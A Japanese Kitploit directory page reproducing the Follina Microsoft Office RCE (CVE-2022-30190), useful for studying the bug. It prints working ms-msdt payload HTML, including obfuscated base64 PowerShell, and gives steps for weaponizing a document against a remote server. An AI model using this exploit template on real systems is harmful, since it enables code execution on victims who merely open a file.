Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-30190 — Microsoft Office Word RCE 再現 (CVE-2022-30190) | Kitploit
ツール/GitHubGitHub/doocop/cve-2022-30190
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubdoocop/cve-2022-30190

CVE-2022-30190

Microsoft Office Word RCE 再現 (CVE-2022-30190)

リポジトリを見る
59144年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-30190

Microsoft Office Word Rce 再現 (CVE-2022-30190)

脆弱性の概要

MS Office の docx ファイルには、HTML ファイルとして外部 OLE オブジェクト参照が含まれる可能性があります。ms-msdt: という HTML シナリオが存在し、msdt 診断ツールを呼び出して、任意のコードを実行できます(パラメータで指定)。

結果として、悪意のある docx ファイルを開くだけで(マクロを使用せずに)RCE を獲得できる恐ろしい攻撃ベクトルとなります。

再現開始

Twitter で @nao_sec が最初に共有したサンプルを入手し、ダウンロードしました。

image-20220531145248604

02-2022-0438.doc を圧縮ファイルとして開きます。

image-20220531145416735

/word/_rels/document.xml.rels を開くと、下図のようになります。

image-20220531145620951

OK、上図の下線部分に、hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html への外部参照が含まれていることがわかります。

元の悪意のある HTML アドレスは既に閉鎖されているため、@nao_sec が提供した悪意のある HTML ファイルをフォークして以下を作成しました。

root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//繰り返し....

    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNhbGMuZXhlIjtTdGFydC1Qcm9jZXNzICRjbWQ7'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>

なぜ先頭に大量のゴミデータが必要なのかというと、HTML ファイル全体を 4096 バイトにするためです。詳細な分析は https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug を参照してください。

上記の POC は POWERSHELL を実行するものですが、これを電卓に置き換えます。コードは以下の通りです。

root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAA... 以下省略(翻訳不要)...

    location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe\"";
</script>

</body>
</html>

上記のコードをリモートサーバーに HTML 形式で保存し、/word/_rels/document.xml.rels 内の外部アドレスを自身のものに置き換えます。以下を参照。

image-20220531150719861

最後に doc ファイルとして保存し、ダブルクリックして開くと以下のデモのようになります。demo2

Tips:

リッチテキスト形式ファイル (.rtf) は、Windows エクスプローラーのプレビューウィンドウだけでこの脆弱性の呼び出しをトリガーできます。CVE-2021-40444 と非常によく似ており、これは「クリック」だけでなく、「ゼロクリック」トリガーによってもこの脅威の深刻さが拡大される可能性があります。

以下のデモを参照:

demo3

ツールをダウンロード